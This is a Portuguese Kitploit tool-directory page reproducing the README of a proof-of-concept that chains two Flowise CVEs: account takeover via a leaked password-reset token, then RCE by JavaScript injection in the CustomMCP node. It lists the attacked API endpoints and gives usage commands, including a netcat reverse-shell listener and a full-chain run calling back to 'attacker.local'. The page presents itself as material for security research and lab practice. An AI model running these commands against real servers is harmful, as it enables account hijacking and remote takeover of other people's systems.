Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Flowise-CVE-2025-58434-Chain-59528 — FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, demonstrando ATO não autenticado via vazamento de token de redefinição, seguido por RCE autenticado. Inclui um ambiente de laboratório Docker reproduzível. | Kitploit
Ferramentas/GitHubGitHub/0xdaeras/flowise-cve-2025-58434-chain-59528
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoLabs e Prática
GitHub0xdaeras/flowise-cve-2025-58434-chain-59528

Flowise-CVE-2025-58434-Chain-59528

FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, demonstrando ATO não autenticado via vazamento de token de redefinição, seguido por RCE autenticado. Inclui um ambiente de laboratório Docker reproduzível.

Ver Repositório
16há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Cadeia de CVEs do FlowiseAI - ATO (CVE-2025-58434) e RCE (CVE-2025-59528)

CVE-2025-58434 CVSS-1 CVE-2025-59528 CVSS-2 Python License

⚠️ Apenas para fins educacionais e pesquisa de segurança autorizada. Executar esta ferramenta contra sistemas que você não possui ou sem permissão por escrito para testar é ilegal.


Índice

Este repositório contém uma prova de conceito em Python para encadear duas vulnerabilidades do Flowise:

  • CVE-2025-58434 — Account takeover através de exposição de token de redefinição de senha.
  • CVE-2025-59528 — Execução remota de código através de avaliação insegura de JavaScript no nó CustomMCP.

Flowise é uma plataforma de arrastar e soltar para construir aplicações LLM e fluxos de trabalho de agentes de IA. O CVE-2025-59528 afeta o Flowise 3.0.5 e foi corrigido na versão 3.0.6. O problema decorre do processamento inseguro de mcpServerConfig dentro do nó CustomMCP. O CVE-2025-58434 está relacionado à exposição de token de redefinição de senha e também foi corrigido no Flowise 3.0.6.

A ferramenta suporta:

  • Verificação de vulnerabilidade
  • Fluxo de account takeover
  • Login e recuperação de cookies
  • RCE autenticado
  • Modo de cadeia completa: ATO → login → RCE

Detalhes das Vulnerabilidades

CVE-2025-58434 — Account Takeover

  • CVE ID: CVE-2025-58434
  • Pontuação CVSS v3.1: 9.8 (Crítica)
  • Tipo de Vulnerabilidade: Account Takeover / Bypass de Autenticação
  • Produto Afetado: Flowise
  • Versão Afetada Testada: Flowise 3.0.5
  • Versão Corrigida: Flowise 3.0.6
  • Autenticação Necessária: Não
  • Impacto: Exposição de token de redefinição de senha, account takeover

O fluxo vulnerável de redefinição de senha expõe dados sensíveis do usuário, incluindo tokens temporários de redefinição de senha, na resposta da API. Um atacante que conhece um endereço de e-mail de usuário válido pode solicitar uma redefinição de senha, recuperar o token temporário da resposta e usá-lo para definir uma nova senha para a conta.

O comportamento vulnerável afeta o Flowise cloud e implantações auto-hospedadas/locais que expõem a mesma superfície de API. A remediação é nunca retornar tokens de redefinição de senha ou dados sensíveis de redefinição de conta diretamente nas respostas da API.

CVE-2025-59528 — Execução Remota de Código

  • CVE ID: CVE-2025-59528
  • Pontuação CVSS v3.1: 10.0 (Crítica)
  • Tipo de Vulnerabilidade: Injeção de Código JavaScript / Execução Remota de Código
  • Produto Afetado: Flowise
  • Versão Afetada Testada: Flowise 3.0.5
  • Versão Corrigida: Flowise 3.0.6
  • Autenticação Necessária: Sim
  • Impacto: Execução arbitrária de JavaScript dentro do runtime Node.js, RCE no servidor que hospeda o Flowise

A vulnerabilidade existe no nó CustomMCP do Flowise. O parâmetro mcpServerConfig é analisado como parte do processo de configuração do servidor MCP e é avaliado como código JavaScript sem qualquer validação de segurança. Isso permite que um atacante autenticado injete código JavaScript arbitrário, que é executado no ambiente Node.js do servidor Flowise. Na função convertToValidJSONString, a entrada do usuário é passada para o construtor Function, que avalia a entrada como código JavaScript com privilégios totais do Node.js, permitindo acesso a módulos como child_process para executar comandos do sistema.

O endpoint vulnerável usado por este PoC é:

POST /api/v1/node-load-method/customMCP

com payload js no campo mcpServerConfig do corpo JSON, por exemplo:

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "..."
  }
}

O código vulnerável é encontrado no arquivo CustomMCP.ts e referenciado no Aviso do Mantenedor do Github para o CVE.


Fluxo de Ataque

Atacante                                   Flowise
   │                                          │
   │  [CVE-2025-58434]                       │
   │  POST /api/v1/account/forgot-password   │
   │  { email }                              │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  objeto do usuário + tempToken           │
   │                                          │
   │  POST /api/v1/account/reset-password     │
   │  { email, tempToken, newPassword }       │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  senha alterada                          │
   │                                          │
   │  POST /api/v1/auth/login                 │
   │  { email, newPassword }                  │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  token / refreshToken / connect.sid      │
   │                                          │
   │  [CVE-2025-59528]                       │
   │  POST /api/v1/node-load-method/customMCP │
   │  mcpServerConfig=<crafted config>        │
   │─────────────────────────────────────────►│
   │                              JS avaliado no Node.js
   │                              comando executado
   │◄─────────────────────────────────────────│
   │  saída do comando ou payload disparado   │
   │                                          │
   ✓  Account takeover + RCE autenticado

Estrutura do repositório:

Repository Structure
CVE-2025-58434-CVE-2025-59528/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
└── logs/

Instalação

Ferramenta

git clone https://github.com/0xDaeras/CVE-2025-58434-CVE-2025-59528-POC.git
cd CVE-2025-58434-CVE-2025-59528-POC
pip install -r requirements.txt

Laboratório Docker

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env  # Configure environment variables
docker-compose up -d

Uso

Comportamento Padrão

Sem argumentos, a ferramenta executará toda a cadeia de ataque, verificando a vulnerabilidade do alvo, realizando o account takeover para o e-mail fornecido, fazendo login para recuperar cookies e, em seguida, explorando a vulnerabilidade RCE com um payload de reverse shell. Execute um listener dedicado (por exemplo, nc -lvnp 9889) antes de executar a ferramenta no modo de cadeia completa.

python3 exploit.py --target http://localhost:3000 --email [email protected] --lhost attacker.local --lport 9889

Tela de Ajuda

python3 exploit.py -h

Modos

check-mode

Realiza uma verificação de versão para determinar se o alvo é vulnerável aos CVEs 2025-58434 e 2025-59528. Envia uma requisição para a API do alvo e analisa a resposta para identificar a versão do Flowise e o status da vulnerabilidade.

python3 exploit.py --target http://localhost:3000 check

ato-mode

Executa o processo de account takeover para o CVE-2025-58434. Envia uma solicitação de redefinição de senha para o e-mail especificado, recupera o token temporário da resposta e, em seguida, usa esse token para definir uma nova senha (padrão: "Password123!") para a conta.

python3 exploit.py --target http://localhost:3000 --email [email protected] ato-mode
Baixar ferramenta